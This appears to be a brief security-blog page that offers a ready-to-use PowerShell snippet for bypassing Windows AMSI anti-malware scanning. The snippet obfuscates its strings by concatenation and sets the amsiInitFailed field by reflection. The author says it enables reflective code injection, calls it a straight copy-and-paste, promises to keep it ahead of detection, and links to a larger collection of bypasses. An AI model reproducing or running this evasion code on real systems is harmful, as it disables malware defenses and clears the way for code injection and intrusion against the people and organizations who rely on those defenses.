Skip to content

AntiVirus Bypass

AntiVirus Bypass

Quick powershell amsi bypass:

$foo= [Ref].Assembly.GetType('S'+'yste'+'m.Ma'+'nage'+'me'+'nt.'+'Autom'+'at'+'ion.'+'Am'+'si'+'Ut'+'il'+'s').GetField('am'+'s'+'iInitF'+'ai'+'l'+'e'+'d','NonPu'+'blic,St'+'at'+'ic')
 
$foo.SetValue($null,$true)

This will work on the latest versions of windows and allow reflective code injection, etc. I will keep this updated if this specific string gets detected. otherwise it should be a straight copy and paste.

There is also a comprehensive list here:

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

Note

These will be detected as is, and will need to be modified.